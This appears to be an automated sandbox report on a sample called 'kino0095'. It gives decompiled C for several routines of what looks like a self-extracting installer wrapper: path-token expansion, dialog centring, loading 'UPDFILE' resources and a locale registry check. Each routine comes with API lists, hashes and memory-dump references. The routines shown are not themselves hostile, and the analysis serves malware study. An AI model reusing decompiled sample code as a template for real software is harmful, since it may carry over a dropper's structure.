                                                                                                                                                                                                                                    0x010b3496
                                                                                                                                                                                                                                    0x010b3484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3486
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3486
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 010B3490
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B349A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B34B2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 010B34C4
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 010B34CB
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 010B34D8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 852535152-612509477
                                                                                                                                                                                                                                    • Opcode ID: 3c9f6d3faed82d16ed8535ee004bbbce9c250da1b95e00417b5f1a900538d35f
                                                                                                                                                                                                                                    • Instruction ID: 7a161da6fbfad92185f5455dc2ad801bce95e2c5a1a0126060af7b2eedd5a94c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9f6d3faed82d16ed8535ee004bbbce9c250da1b95e00417b5f1a900538d35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601B135340124ABD76A5F6DD9CC9EE3AA4FB05750B204824FAC69B584CF3EAE41CB80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E010B2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x10b8004; // 0x72151d89
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x10b9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E010B1680(_t65, E010B17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E010B65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E010B1680(_t65, E010B17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E010B6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                    0x010b2aac
                                                                                                                                                                                                                                    0x010b2ab7
                                                                                                                                                                                                                                    0x010b2abc
                                                                                                                                                                                                                                    0x010b2abe
                                                                                                                                                                                                                                    0x010b2ac3
                                                                                                                                                                                                                                    0x010b2ac6
                                                                                                                                                                                                                                    0x010b2ac9
                                                                                                                                                                                                                                    0x010b2ace
                                                                                                                                                                                                                                    0x010b2ae6
                                                                                                                                                                                                                                    0x010b2bdc
                                                                                                                                                                                                                                    0x010b2bdc
                                                                                                                                                                                                                                    0x010b2be0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2af2
                                                                                                                                                                                                                                    0x010b2afc
                                                                                                                                                                                                                                    0x010b2b00
                                                                                                                                                                                                                                    0x010b2b05
                                                                                                                                                                                                                                    0x010b2b05
                                                                                                                                                                                                                                    0x010b2b0b
                                                                                                                                                                                                                                    0x010b2bca
                                                                                                                                                                                                                                    0x010b2bd1
                                                                                                                                                                                                                                    0x010b2b11
                                                                                                                                                                                                                                    0x010b2b18
                                                                                                                                                                                                                                    0x010b2b26
                                                                                                                                                                                                                                    0x010b2b99
                                                                                                                                                                                                                                    0x010b2bc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2b9b
                                                                                                                                                                                                                                    0x010b2bae
                                                                                                                                                                                                                                    0x010b2bb3
                                                                                                                                                                                                                                    0x010b2bb5
                                                                                                                                                                                                                                    0x010b2bb5
                                                                                                                                                                                                                                    0x010b2bb8
                                                                                                                                                                                                                                    0x010b2bb8
                                                                                                                                                                                                                                    0x010b2bba
                                                                                                                                                                                                                                    0x010b2bbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2bb8
                                                                                                                                                                                                                                    0x010b2b28
                                                                                                                                                                                                                                    0x010b2b2e
                                                                                                                                                                                                                                    0x010b2b33
                                                                                                                                                                                                                                    0x010b2b39
                                                                                                                                                                                                                                    0x010b2b3c
                                                                                                                                                                                                                                    0x010b2b3c
                                                                                                                                                                                                                                    0x010b2b3e
                                                                                                                                                                                                                                    0x010b2b3f
                                                                                                                                                                                                                                    0x010b2b55
                                                                                                                                                                                                                                    0x010b2b5d
                                                                                                                                                                                                                                    0x010b2b64
                                                                                                                                                                                                                                    0x010b2b64
                                                                                                                                                                                                                                    0x010b2b7a
                                                                                                                                                                                                                                    0x010b2b7f
                                                                                                                                                                                                                                    0x010b2b81
                                                                                                                                                                                                                                    0x010b2b81
                                                                                                                                                                                                                                    0x010b2b84
                                                                                                                                                                                                                                    0x010b2b84
                                                                                                                                                                                                                                    0x010b2b86
                                                                                                                                                                                                                                    0x010b2b87
                                                                                                                                                                                                                                    0x010b2bbf
                                                                                                                                                                                                                                    0x010b2bc1
                                                                                                                                                                                                                                    0x010b2bc1
                                                                                                                                                                                                                                    0x010b2b26
                                                                                                                                                                                                                                    0x010b2bda
                                                                                                                                                                                                                                    0x010b2bda
                                                                                                                                                                                                                                    0x010b2be6
                                                                                                                                                                                                                                    0x010b2be6
                                                                                                                                                                                                                                    0x010b2bf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010B2AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 010B2AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 010B2B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 010B2B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 010B2B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 010B2BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 3374da3a52c5909ac9bb9cfd2fc80e8b85719692db4d8cd3dc975430b2b4fbc4
                                                                                                                                                                                                                                    • Instruction ID: 7508a3a8d1a0f0d25b64235183fea101dfec0676ea8c831993a0cfaba0e1ea66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3374da3a52c5909ac9bb9cfd2fc80e8b85719692db4d8cd3dc975430b2b4fbc4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC412A346041459FDB669F3898D4EFE7FA9DF46340F0404DAD8C297202DF3A5A46CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E010B43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x10b8004; // 0x72151d89
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E010B6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                    0x010b43d0
                                                                                                                                                                                                                                    0x010b43d8
                                                                                                                                                                                                                                    0x010b43df
                                                                                                                                                                                                                                    0x010b43e6
                                                                                                                                                                                                                                    0x010b43ec
                                                                                                                                                                                                                                    0x010b43f1
                                                                                                                                                                                                                                    0x010b4400
                                                                                                                                                                                                                                    0x010b4403
                                                                                                                                                                                                                                    0x010b440b
                                                                                                                                                                                                                                    0x010b4420
                                                                                                                                                                                                                                    0x010b4429
                                                                                                                                                                                                                                    0x010b4437
                                                                                                                                                                                                                                    0x010b4444
                                                                                                                                                                                                                                    0x010b4447
                                                                                                                                                                                                                                    0x010b444d
                                                                                                                                                                                                                                    0x010b4454
                                                                                                                                                                                                                                    0x010b445b
                                                                                                                                                                                                                                    0x010b4460
                                                                                                                                                                                                                                    0x010b4461
                                                                                                                                                                                                                                    0x010b4467
                                                                                                                                                                                                                                    0x010b446f
                                                                                                                                                                                                                                    0x010b4473
                                                                                                                                                                                                                                    0x010b4473
                                                                                                                                                                                                                                    0x010b4463
                                                                                                                                                                                                                                    0x010b4463
                                                                                                                                                                                                                                    0x010b4463
                                                                                                                                                                                                                                    0x010b447a
                                                                                                                                                                                                                                    0x010b4481
                                                                                                                                                                                                                                    0x010b4484
                                                                                                                                                                                                                                    0x010b448a
                                                                                                                                                                                                                                    0x010b4492
                                                                                                                                                                                                                                    0x010b4496
                                                                                                                                                                                                                                    0x010b4496
                                                                                                                                                                                                                                    0x010b4486
                                                                                                                                                                                                                                    0x010b4486
                                                                                                                                                                                                                                    0x010b4486
                                                                                                                                                                                                                                    0x010b44b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 010B43F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 010B440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 010B4423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 010B442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010B443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 010B4447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010B44A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: 94bd9b41fda92bae85df972a46110e44af811464e8cda3beb2907b6617d5160a
                                                                                                                                                                                                                                    • Instruction ID: dc858a4a827c082621aee92bff48de1532f431750506327edc694fc7c579cbf2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94bd9b41fda92bae85df972a46110e44af811464e8cda3beb2907b6617d5160a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49313E32F00119AFCB14CFB8D9889EEBBB5EB89310F154569F846F7244EB356D058B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E010B6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x10b8004; // 0x72151d89
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E010B171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x10b9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x10ba288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E010B171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E010B6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                    0x010b6298
                                                                                                                                                                                                                                    0x010b62a0
                                                                                                                                                                                                                                    0x010b62a7
                                                                                                                                                                                                                                    0x010b62ad
                                                                                                                                                                                                                                    0x010b62af
                                                                                                                                                                                                                                    0x010b62bb
                                                                                                                                                                                                                                    0x010b62c3
                                                                                                                                                                                                                                    0x010b62c4
                                                                                                                                                                                                                                    0x010b633b
                                                                                                                                                                                                                                    0x010b633b
                                                                                                                                                                                                                                    0x010b6345
                                                                                                                                                                                                                                    0x010b634d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b62da
                                                                                                                                                                                                                                    0x010b62de
                                                                                                                                                                                                                                    0x010b635f
                                                                                                                                                                                                                                    0x010b6369
                                                                                                                                                                                                                                    0x010b62e0
                                                                                                                                                                                                                                    0x010b62e0
                                                                                                                                                                                                                                    0x010b62e0
                                                                                                                                                                                                                                    0x010b62e3
                                                                                                                                                                                                                                    0x010b62e5
                                                                                                                                                                                                                                    0x010b62e5
                                                                                                                                                                                                                                    0x010b62e8
                                                                                                                                                                                                                                    0x010b62e8
                                                                                                                                                                                                                                    0x010b62ea
                                                                                                                                                                                                                                    0x010b62eb
                                                                                                                                                                                                                                    0x010b62ef
                                                                                                                                                                                                                                    0x010b62f1
                                                                                                                                                                                                                                    0x010b62f3
                                                                                                                                                                                                                                    0x010b6302
                                                                                                                                                                                                                                    0x010b6308
                                                                                                                                                                                                                                    0x010b630d
                                                                                                                                                                                                                                    0x010b6314
                                                                                                                                                                                                                                    0x010b6314
                                                                                                                                                                                                                                    0x010b6316
                                                                                                                                                                                                                                    0x010b6319
                                                                                                                                                                                                                                    0x010b6355
                                                                                                                                                                                                                                    0x010b6357
                                                                                                                                                                                                                                    0x010b631b
                                                                                                                                                                                                                                    0x010b631b
                                                                                                                                                                                                                                    0x010b6331
                                                                                                                                                                                                                                    0x010b6334
                                                                                                                                                                                                                                    0x010b6339
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6339
                                                                                                                                                                                                                                    0x010b6319
                                                                                                                                                                                                                                    0x010b636b
                                                                                                                                                                                                                                    0x010b637d
                                                                                                                                                                                                                                    0x010b637d
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B62CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B62D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010B6345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B6357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: 259b80cd3493e3c447a795c73554622c1d3efe195474f5472c4dac8c28a1a502
                                                                                                                                                                                                                                    • Instruction ID: 0d04427d2cb33a3e14b6831ba8e36e5f29ba16d6e948abffa3cbe75a23f7bb73
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 259b80cd3493e3c447a795c73554622c1d3efe195474f5472c4dac8c28a1a502
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB21D875A01219AFDB209F64DCC59FE7B78FF44714B004169FA82A3201D73B99028BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x10b8004; // 0x72151d89
				_v8 = _t19 ^ _t44;
				_t41 =  *0x10b81d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x10b81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x10b81d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x10b1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E010B66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x10b81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E010B6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                    0x010b681f
                                                                                                                                                                                                                                    0x010b682a
                                                                                                                                                                                                                                    0x010b6831
                                                                                                                                                                                                                                    0x010b6836
                                                                                                                                                                                                                                    0x010b683c
                                                                                                                                                                                                                                    0x010b683e
                                                                                                                                                                                                                                    0x010b6848
                                                                                                                                                                                                                                    0x010b6851
                                                                                                                                                                                                                                    0x010b685d
                                                                                                                                                                                                                                    0x010b6864
                                                                                                                                                                                                                                    0x010b6876
                                                                                                                                                                                                                                    0x010b693a
                                                                                                                                                                                                                                    0x010b693a
                                                                                                                                                                                                                                    0x010b687c
                                                                                                                                                                                                                                    0x010b687e
                                                                                                                                                                                                                                    0x010b6885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b68d6
                                                                                                                                                                                                                                    0x010b68f4
                                                                                                                                                                                                                                    0x010b6900
                                                                                                                                                                                                                                    0x010b6902
                                                                                                                                                                                                                                    0x010b690a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b690c
                                                                                                                                                                                                                                    0x010b690c
                                                                                                                                                                                                                                    0x010b691c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b691e
                                                                                                                                                                                                                                    0x010b6924
                                                                                                                                                                                                                                    0x010b692b
                                                                                                                                                                                                                                    0x010b6932
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b692b
                                                                                                                                                                                                                                    0x010b691c
                                                                                                                                                                                                                                    0x010b690a
                                                                                                                                                                                                                                    0x010b6885
                                                                                                                                                                                                                                    0x010b6876
                                                                                                                                                                                                                                    0x010b6951

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010B686E
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 010B68A7
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010B68CC
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,?,0000000C), ref: 010B68F4
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 010B6902
                                                                                                                                                                                                                                      • Part of subcall function 010B66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010B691A), ref: 010B6741
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 010B68C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
